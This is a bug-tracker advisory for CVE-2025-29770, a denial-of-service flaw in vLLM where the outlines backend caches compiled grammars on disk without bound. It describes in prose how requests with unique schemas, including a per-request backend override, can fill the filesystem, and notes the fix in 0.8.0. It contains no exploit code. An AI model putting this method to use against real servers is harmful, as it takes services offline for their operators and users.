Bug 2353368 (CVE-2025-29770) - CVE-2025-29770 vllm: vLLM denial of service via outlines unbounded cache on disk
Summary: CVE-2025-29770 vllm: vLLM denial of service via outlines unbounded cache on disk
Keywords:
Status: NEW
Alias: CVE-2025-29770
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
medium
medium
Target Milestone: ---
Assignee: Product Security DevOps Team
QA Contact:
URL:
Whiteboard:
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2025-03-19 16:01 UTC by OSIDB Bzimport
Modified: 2025-03-19 18:22 UTC (History)
1 user (show)

Fixed In Version:
Clone Of:
Environment:
Last Closed:
Embargoed:


Attachments (Terms of Use)

Description OSIDB Bzimport 2025-03-19 16:01:28 UTC
vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. The outlines library is one of the backends used by vLLM to support structured output (a.k.a. guided decoding). Outlines provides an optional cache for its compiled grammars on the local filesystem. This cache has been on by default in vLLM. Outlines is also available by default through the OpenAI compatible API server. The affected code in vLLM is vllm/model_executor/guided_decoding/outlines_logits_processors.py, which unconditionally uses the cache from outlines. A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service if the filesystem runs out of space. Note that even if vLLM was configured to use a different backend by default, it is still possible to choose outlines on a per-request basis using the guided_decoding_backend key of the extra_body field of the request. This issue applies only to the V0 engine and is fixed in 0.8.0.


Note You need to log in before you can comment on or make changes to this bug.